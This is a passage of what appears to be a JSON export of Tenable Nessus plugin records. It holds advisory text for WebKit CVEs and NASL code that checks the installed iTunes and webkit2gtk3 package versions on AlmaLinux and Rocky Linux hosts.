script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"installed_sw/iTunes DAAP\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar app = 'iTunes DAAP';\nvar port = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nvar app_info = vcf::get_app_info(app:app, port:port);\nif (app_info.Type != 'Windows') audit(AUDIT_OS_NOT, 'Windows');\nvar constraints = [{'fixed_version':'12.12.3'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:39:10", "description": "The remote AlmaLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the ALSA-2022:8054 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22624)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to code execution. (CVE-2022-26700)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-19T00:00:00", "type": "nessus", "title": "AlmaLinux 9 : webkit2gtk3 (ALSA-2022:8054)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-19T00:00:00", "cpe": ["p-cpe:/a:alma:linux:webkit2gtk3", "p-cpe:/a:alma:linux:webkit2gtk3-devel", "p-cpe:/a:alma:linux:webkit2gtk3-jsc", "p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel", "cpe:/o:alma:linux:9", "cpe:/o:alma:linux:9::appstream"], "id": "ALMA_LINUX_ALSA-2022-8054.NASL", "href": "https://www.tenable.com/plugins/nessus/168001", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2022:8054.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168001);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/19\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n script_xref(name:\"ALSA\", value:\"2022:8054\");\n\n script_name(english:\"AlmaLinux 9 : webkit2gtk3 (ALSA-2022:8054)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nALSA-2022:8054 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-22624)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey\n 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to code execution. (CVE-2022-26700)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in\n WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/9/ALSA-2022-8054.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26719\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(1173, 120, 200, 416, 787);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::appstream\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(os_release) || 'AlmaLinux' >!< os_release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 9.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:37:00", "description": "The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:7704 advisory.\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22624)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-17T00:00:00", "type": "nessus", "title": "Rocky Linux 8 : webkit2gtk3 (RLSA-2022:7704)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2023-03-21T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:webkit2gtk3", "p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-debugsource", "p-cpe:/a:rocky:linux:webkit2gtk3-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo", "cpe:/o:rocky:linux:8"], "id": "ROCKY_LINUX_RLSA-2022-7704.NASL", "href": "https://www.tenable.com/plugins/nessus/167812", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2022:7704.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167812);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n script_xref(name:\"RLSA\", value:\"2022:7704\");\n\n script_name(english:\"Rocky Linux 8 : webkit2gtk3 (RLSA-2022:7704)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nRLSA-2022:7704 advisory.\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in\n WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-22624)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey\n 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2022:7704\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:8\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 8.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-debuginfo / webkit2gtk3-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T18:39:19", "description": "The remote Oracle Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2022-8054 advisory.\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, 